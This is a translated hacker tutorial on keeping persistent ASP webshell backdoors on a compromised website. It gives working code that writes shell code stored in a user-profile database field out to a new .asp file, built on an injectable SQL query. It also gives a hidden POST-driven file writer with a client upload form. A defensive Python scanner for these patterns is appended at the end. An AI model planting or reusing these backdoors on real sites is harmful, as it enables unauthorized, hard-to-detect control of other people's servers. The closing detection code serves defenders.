Preface: It has been a long time from the original Site Manager to the several popular ASP backdoors of today. I believe most network administrators can name the classic webshells, such as Haiyang, Veteran, Blue Screen and so on, and I also believe most of them have learned to find these Trojans by keyword search. Of course, if you want to hide a backdoor today, you need some skill. As the saying goes, "the Buddha is one foot tall, and so am I."
I don't deny that writing the ASP Trojan into an image file, as mentioned earlier, is a good method. In fact, it can be written not only into images, but also into mp3 files and doc files.
The copy file1/parameter + file2/parameter targetfile method can be used flexibly to hide files. The parameters are /a for ASCII mode and /b for binary mode, so I won't go into detail. As for how to upload a webshell, or what a webshell is, that is outside the scope of this article. What we are going to talk about today is how to put the backdoor into a database with the .mdb suffix. The premise is that we have already obtained a webshell...
As we know, many sites make users fill in a lot of information when registering, such as user name, password, QQ, email, personal profile, phone number, contact information, address, etc., and the database has corresponding tables, fields and values for each of them. What I want to do today is register a user, write shell code into my personal profile, and then modify a file on the site so that, when that file is triggered, it copies the shell code from my profile out into the current directory.
Without further ado, let’s take a look at the code:
<%
' Inserted into an existing page (e.g. news.asp) that already opens the
' database connection object "conn"; normal visitors never trigger it.
if request("action")="firefox" then
    fname=request.querystring("fn")    ' name of the file to create
    tname=request.querystring("tn")    ' table holding the registered user
    bname=request.querystring("bn")    ' field holding the stored content
    id=request.querystring("id")       ' name of the key column
    idvalue=request.querystring("idv") ' key value of the row to read
    set rs=server.createobject("ADODB.recordset")
    ' every part of the statement is taken from the query string
    sql="select "& bname & " from "&tname& " where "&id&"="&idvalue
    rs.open sql,conn,1,3
    if not rs.eof then
        content=rs(bname)
    else
        response.write "Nothing"
    end if
    rs.close
    ' the field's contents are written to disk next to this page
    set fso=Server.createObject("Scripting.FileSystemObject")
    set txtfile=fso.createtextfile(server.mappath(fname))
    txtfile.writeline(content)
    txtfile.close
end if
%>
Add the above code to a file on the site, such as news.asp. From the information we already have (after registering on the site, download the database and look at its structure): the user firefox that I registered is in the user table, its id value is 119, and the field that stores my registered resume is jl. So the request is:
news.asp?action=firefox&fn=firefox.asp&tn=user&bn=jl&id=id&idv=119
When this request is made, a webshell named firefox.asp is written into the same directory as news.asp. This is only one of thousands of hiding methods. Next, let's talk about another, more convenient hiding method. This one has nothing to do with the .mdb suffix.
Similarly, we again modify the other party's news.asp and insert the following code into it:
<%
' Server side: takes a file name and content from a POST and writes
' the content to that name, relative to the directory of this page.
if request("action")="firefox" then
    n=request.form("n")   ' file name to create
    c=request.form("c")   ' file content
    set fso=Server.createObject("Scripting.FileSystemObject")
    set txtfile=fso.createtextfile(server.mappath(n))
    txtfile.writeline(c)
    txtfile.close
end if
%>
This code is relatively simple; it can be regarded as the server side of a Trojan. To use it, pair it with the following client page:
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<META content="MSHTML 6.00.2900.2180" name=GENERATOR>
<title>Fst Firefox Technology Alliance[www.wrsky.com]</title>
</HEAD>
<BODY>
<!-- posts the fields n (file name) and c (file content) to the modified page -->
<FORM action="http://localhost/config.asp?action..." method=post>
Name:<INPUT size=50 name=n><BR><BR>
Shell:<TEXTAREA name=c rows=10 cols=80></TEXTAREA>
<INPUT type=submit value=Save>
</FORM></BODY></HTML>
Change "http://localhost/config.asp?action=firefox" in the above code to your server's address and save it as a local .htm file. Open it locally, fill in the name and content of the file to be generated, and submit it to the remote server. OK, this is another way to leave a backdoor.
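Both methods above defeat keyword searches for known webshells, so a defender has to look for the primitive instead: a FileSystemObject file write whose path comes straight from the request, and ASP code sitting in a user-editable database field. The following scanner is an added example, not code from the article; the file names and the sample sources it scans are constructed for the example.

```python
import re

# Added example (not from the article): VBScript is case-insensitive, so every
# regex is too.
TAINT_RE = re.compile(r'\b(\w+)\s*=\s*request(?:\.querystring|\.form)?\s*\(', re.I)
FSO_RE = re.compile(r'scripting\.filesystemobject', re.I)
WRITE_RE = re.compile(
    r'\b(createtextfile|opentextfile)\s*\(\s*server\.mappath\s*\(\s*(\w+)\s*\)', re.I)
STORED_ASP_RE = re.compile(
    r'<%|<script[^>]*runat\s*=\s*["\']?server|server\.createobject', re.I)

def find_request_controlled_file_writes(asp_source):
    """Return [(call, variable)] for each FileSystemObject create/open whose path
    is a variable filled from the HTTP request; an empty list means no finding."""
    if not FSO_RE.search(asp_source):
        return []
    tainted = {m.group(1).lower() for m in TAINT_RE.finditer(asp_source)}
    return [(call.lower(), var) for call, var in WRITE_RE.findall(asp_source)
            if var.lower() in tainted]

def stored_field_has_asp(field_value):
    """True when a user-editable database field (profile, resume, ...) carries
    ASP code, i.e. the payload the first method parks inside the .mdb."""
    return STORED_ASP_RE.search(field_value) is not None

def scan_site(files):
    """Map file name -> findings, keeping only files with at least one."""
    findings = {}
    for name, source in files.items():
        hits = find_request_controlled_file_writes(source)
        if hits:
            findings[name] = hits
    return findings

# Constructed samples: the article's two server-side snippets in miniature, plus
# a benign page that uses FSO with a fixed path and must not be reported.
SAMPLES = {
    "news_method1.asp": '<%\nfname=request.querystring("fn")\n'
                        'set fso=Server.createObject("Scripting.FileSystemObject")\n'
                        'set txtfile=fso.createtextfile(server.mappath(fname))\n%>',
    "news_method2.asp": '<%\nn=request.form("n")\nc=request.form("c")\n'
                        'set fso=Server.createObject("Scripting.FileSystemObject")\n'
                        'set txtfile=fso.createtextfile(server.mappath(n))\n'
                        'txtfile.writeline(c)\n%>',
    "counter.asp": '<%\nset fso=Server.createObject("Scripting.FileSystemObject")\n'
                   'set f=fso.opentextfile(server.mappath("counter.txt"))\n%>',
}
```

Running scan_site(SAMPLES) reports the two modified pages and stays silent on counter.asp; in practice the same function is run over every .asp file under the web root, and stored_field_has_asp over exported profile and resume columns.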